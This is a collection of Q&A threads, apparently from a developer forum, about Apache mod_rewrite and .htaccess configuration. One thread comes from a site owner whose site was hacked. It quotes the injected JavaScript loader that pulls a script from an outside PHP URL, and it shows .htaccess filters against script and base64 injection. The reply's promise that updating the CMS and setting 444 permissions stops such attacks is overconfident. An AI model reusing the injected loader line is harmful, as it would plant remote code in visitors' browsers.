I am attempting to setup a webdav website for various clients to upload/download files. However I don't want each client to see the other clients' data. Each client uses SSL client certificates to authenticate, so I would like to chroot them into their own directory tree.
For example:
https://example.com/webdav/upload
Should map to filesystem location
/somewebroot/webdav/SSL_USERNAME/upload
I thought that I could use mod_rewrite for this but my rules seem to send me into an infinite redirection loop. Any thoughts?
Alias /webdav /somewebroot/webdav
<Directory /somewebroot/webdav>
RewriteEngine On
RewriteBase /webdav
RewriteCond %{SSL:SSL_CLIENT_S_DN_CN} ADMIN #The admin does not get chrooted
RewriteRule .* - [L]
RewriteCond %{REQUEST_URI} !^%{SSL:SSL_CLIENT_S_DN_CN}/(.*)
RewriteRule ^(.*) %{SSL:SSL_CLIENT_S_DN_CN}/$1 [L]
</Directory>
The fix for this is fairly simple once you figure out that "RewriteCond" does not support server variables in the PATTERN. So you have to get it into the pattern by using a backreference. Also "RewriteCond" does not use the "RewriteBase" directive so you also have to take that into account as well.
Alias /webdav /somewebroot/webdav
<Directory /somewebroot/webdav>
RewriteEngine On
RewriteBase /webdav
RewriteCond %{SSL:SSL_CLIENT_S_DN_CN} ADMIN #The admin does not get chrooted
RewriteRule .* - [L]
RewriteCond %{SSL:SSL_CLIENT_S_DN_CN}::%{REQUEST_URI} !^(.*)::/webdav/\1/(.*)
RewriteRule ^(.*) %{SSL:SSL_CLIENT_S_DN_CN}/$1 [L]
</Directory>
Related
I have the following setup.
Apache running with a separate VirtualHost file for each site.
Each of these has their own set of rewrite rules, for http to https for example which is all running fine.
What we would like to happen is this, from the global config we need to be able to check if a request is for a particular subdirectory. If it is then we should allow this request to process as it should but at that point we do not want the individual virtual host file rewrite rules to kick in. Therefore allowing this directory to be served on non https connections and not be redirected to https.
I have set up the rewrite rules and can match on the directories and redirect to an external url if it matches from the global which shows its inheriting but if I try to just allow it through the virtual hosts rewrites kick in and it redirects.
I have tried using L and END but this did not work either.
Is there any way of achieving this without editing the virtual host files that are already configured?
Main httpd config entry
<Directory "/www">
Options Indexes Includes FollowSymLinks MultiViews
AllowOverride All
allow from all
Order allow,deny
Require all granted
RewriteEngine On
RewriteOptions InheritDownBefore
RewriteCond %{REQUEST_URI} ^/sub_directory/$ [NC]
RewriteRule ^(.*) $1 [L,END]
#RewriteRule ^(.*) - [L,END]
#RewriteRule ^(.*) http://www.google.com [L,END] # This does get triggered
</Directory>
sample virtual host file.
<VirtualHost *:80>
ServerName urlone.com
ServerAlias urltwo.com
DocumentRoot /www/
RewriteEngine On
# redirect to https
RewriteCond %{HTTPS} !=on
RewriteRule ^(.*) https://urlone.com$1 [R=301,L]
</VirtualHost>
so if I visit urlone.com it should redirect to https://urlone.com but if I visit urlone.com/sub_directory it needs to not allow the redirect to https.
I hope this makes sense to someone and thanks in advance for any help.
In global httpd.conf:
RewriteEngine On
RewriteOptions InheritDownBefore
RewriteCond %{REQUEST_URI} ^/sub_directory$ [NC]
RewriteRule ^ - [E=PATH_MATCHED:true]
(if needed, you can add additional rules, or additional flags to the above rule)
In virtual_host.conf
RewriteCond %{ENV:PATH_MATCHED} !=true
RewriteCond %{HTTPS} !=on
RewriteRule ^ https://urlone.com%{REQUEST_URI} [R=301,L]
I recently purchased shared hosting for an app that previously worked well on my local server via Apache Virtual Host configuration. However, my shared hosting provider (like most) does not give customers access to the httpd-conf files, meaning I have to emulate the configuration within an .htaccess file (or multiple). This presents a problem, because .htaccess does not support <VirtualHost> configuration including the very important AliasMatch directive. So my question to the community is how might one replicate the following AliasMatches using RewriteRules or Redirects:
AliasMatch /app/(.*)\.(js|css|rdf|xml|ico|txt|gif|html|png|jpg|jpeg|json|eot|woff|svg|ttf|pdf)$ "c:/wamp/www/siteroot/app/$1.$2"
AliasMatch /i18n/(.*)\.json$ "/wamp/www/siteroot/app/i18n/$1.json"
AliasMatch /(.*)\.(js|css|rdf|xml|ico|txt|gif|html|png|jpg|jpeg|json|eot|woff|svg|ttf|pdf|csv)$ "c:/wamp/www/siteroot/adminApp/$1.$2"
AliasMatch /rest/(.*) "C:/wamp/www/siteroot/rest/$1"
AliasMatch /img/(.*) "C:/wamp/www/siteroot/adminApp/img/$1"
AliasMatch /(.*) "C:/wamp/www/siteroot/adminApp/index.html"
The filepaths will obviously be changed accordingly. It seems too obvious to just do:
RewriteRule {regex} {filepath} [R=301]
Any help is greatly appreciated!
You can just remove the root part out, and use L instead of R=301 (which will externally redirect, causing the browser to request a new URL and change what's in the location bar):
RewriteEngine On
# this is to prevent looping
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteRule ^app/(.*)\.(js|css|rdf|xml|ico|txt|gif|html|png|jpg|jpeg|json|eot|woff|svg|ttf|pdf)$ /app/$1.$2 [L]
RewriteRule ^i18n/(.*)\.json$ /app/i18n/$1.json [L]
RewriteRule ^(.*)\.(js|css|rdf|xml|ico|txt|gif|html|png|jpg|jpeg|json|eot|woff|svg|ttf|pdf|csv)$ /adminApp/$1.$2 [L]
# Doesn't look like you need this rule
RewriteRule ^rest/(.*) /rest/$1 [L]
RewriteRule ^img/(.*) /adminApp/img/$1 [L]
RewriteRule ^(.*) /adminApp/index.html [L]
Yesterday someone attacked my sites.
I use my own CMS and I doubt that they have access to .Htaccess
I would like to know if my .Htaccess is protected.
Actually my js files was affected by this code:
/*df1e0b*/
/**/
document.write("<script type='text/javascript' src='http://audiorealestudio.com /fotosdiegoalejandro/VfTzdPj4.php'></"+ "script>");
/*/df1e0b*/
Also i find one php file on root rbKcy8Vj.php
This is my htaccess
# protect .htaccess
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
# directory browsing
Options All -Indexes
<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<Files ~ ".(xml|css|jpe?g|png|gif|js)$">
Allow from all
</Files>
<Files config.php>
Order deny,allow
Deny from all
</Files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{REQUEST_URI} ^(.*)_vti(.*)$ [OR]
RewriteRule ^(.*)$ index.php [F,L]
RewriteRule ^contact/?$ contact.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^test/([0-9a-zA-Z-_]+)/?$ test.php?cat=$1 [QSA,L]
No actually your .htaccess doesnt seem to be protected. I have gone through almost the same earlier, and my .htaccess was compromised multiple times during that attack even if i set its permissions to 444.
Bonus: How to resolve this issues?
Alright I have faced this issue earlier with Joomla CMS, this usually happens when you don't update and 0-day exploits turn up or due to bad plugins. Based on your javascript code above it looks like a XSS exploit.
Now what has happened is that a PHP shell has been uploaded to your server via the script code executed, you need to first update your cms so that this exploit does not occur again. Clean all the files affected (remove weird code you end up seeing) there might be multiple files best way is to see the date modified. Also look through your folders for suspicious files, you can find them using date modified/created and the dates might be weird like in my case it was set was 1970 so I couldn't find it easily.
After you have removed the suspicious js code, weird php scripts and updated your cms then make sure your .htaccess is clean and its permissions are set as 444. Thats it, the attack wont happen again (unless you didnt update your cms)
I have two questions regarding pointing subdomains to a directory:
Currently I run local, but I can run my site on a fake domain i have set up (with hosts file), its called mysite.com. How can i (by server settings?) do so All subdomains will point to / ? Example anders.mysite.com should show mysite.com and asdassdd.mysite.com also.
Maybe 1. is not necessary, but how do i by htaccess point anders.mysite.com to mysite.com/anders ? Important notice is that should not redirect.
Why i thought of 1. is because I do not want to specify anywhere in the htaccess or any apache/domain setting, what the subdomain are, since this will be dynamic (created by logged in users in my webapplication)
Currently the users can use mysite.com/anders/ which is a URI they have created, and not a real directory. In the Kohana bootstrap I am then grabbing the URI and showing the relevant user page.
I am using Kohana MVC framework and have this in my htaccess:
# Turn on URL rewriting
RewriteEngine On
# Installation directory
RewriteBase /
# Protect hidden files from being viewed
<Files .*>
Order Deny,Allow
Deny From All
</Files>
# Protect application and system files from being viewed
RewriteRule ^(?:application|modules|system)\b.* index.php/$0 [L]
# Allow any files or directories that exist to be displayed directly
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
# Rewrite all other URLs to index.php/URL
RewriteRule .* index.php/$0 [PT]
Any help appreciated!
For 1, in your vhost just add a ServerAlias:
ServerAlias *.mysite.com
Then any subdomain (www included) will get pointed to the same document root.
If you want to put subdomains in their own directory (and since you have access to server config), you can use mod_vhost_alias and the VirtualDocumentRoot directive:
VirtualDocumentRoot /path/to/your/htdocs/%1
So if you request blah.mysite.com, you'll end up in /path/to/your/htdocs/blah as the doc root.
If it's a matter of you needing directory names of non-existent directories in the URI so that Kohana can route them, you'll need to make sure you have mod_proxy loaded:
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteCond %{HTTP_HOST} ^([^.]+)\.
RewriteCond %{REQUEST_URI} !^/%1/
RewriteRule ^(.*)$ /%1/$1 [L,P]
To proxy the request back to Kohana with the right URI.
how do i by htaccess point anders.mysite.com to mysite.com/anders ? Important notice is that should not redirect.
You can use this rule:
RewriteCond %{HTTP_HOST}:%{REQUEST_URI} ^([^.]+)\.[^:]+:(?!/\1/).*$
RewriteRule ^ /%1%{REQUEST_URI} [L]
We are changing our domain name and this is meant to work for stand alone applications. In Apache virtual host file the DocumentRoot is /var/www/website/html, not /var/www/example/html as in this block:
Alias /apps/dept /var/www/example/html/apps/dept
<Directory "/var/www/example/html/apps/dept/">
Options FollowSymLinks
AllowOverride All
Order allow,deny
Allow from all
</Directory>
I put an .htaccess file in /var/www/example/html/apps/dept directory as follows:
RewriteEngine On
RewriteBase /apps/dept/
RewriteCond %{HTTP_HOST} ^example.orgname.state.tx.us/apps/dept [NC]
RewriteRule ^(.*)$ http://example.orgname.texas.gov/apps/dept/$1 [L,R=301]
This seems to follow what is recommended here, http://httpd.apache.org/docs/current/mod/mod_rewrite.html and Apache : How to Use Rewrite Engine Inside Alias. I see no results. The new domain has a virutal host config in the VH file, also. This same basic rewrite works for our Drupal website which does not use an alias. What changes might be necessary to have the domain name rewritten with an appended application pathname? Is the RewriteBase incorrect?
Thx.
So you only want to redirect /apps/dept/, correct? This should work. Place it as an .htaccess or in the Apache config for example.orgname.state.tx.us and all should work as expected.
RewriteEngine on
RewriteRule ^/apps/dept/(.*)$ http://example.orgname.texas.gov/apps/dept/$1 [NC,L,R=301]
So now, any requests going to this URL
http://example.orgname.state.tx.us/apps/dept/
Will now go to this URL:
http://example.orgname.texas.gov/apps/dept/
And any request parameters to the right of the URL will be passed along as well.
EDIT Just reread what you wrote here:
I put an .htaccess file in /var/www/example/html/apps/dept directory
as follows.
The .htaccess I described above should be placed in /var/www/example/html/ and not in the /apps/dept subdirectory.
But if you want the same behavior from an .htaccess placed in /apps/dept then use this:
RewriteEngine on
RewriteRule ^(.*)$ http://example.orgname.texas.gov/apps/dept/$1 [NC,L,R=301]
This way any request made from /apps/dept will to to example.orgname.texas.gov/apps/dept/ including subdirectories of /apps/dept such as /apps/dept/test_app1, /apps/dept/test_app2 or /apps/dept/test_app3.
Or perhaps try this:
RewriteEngine on
RewriteRule (.*)$ http://example.orgname.texas.gov/apps/dept/$1 [NC,L,R=301]
Note I removed the ^ which would force the RewriteRule to match the beginning of the URL.
You cannot match Request URI in %{HTTP_HOST} variable, it matches only domain name. Chang your rule to:
RewriteEngine On
RewriteBase /apps/dept/
RewriteCond %{HTTP_HOST} ^example\.orgname\.state\.tx\.us$ [NC]
RewriteRule ^(.*)$ http://example.orgname.texas.gov/apps/dept/$1 [L,R=301]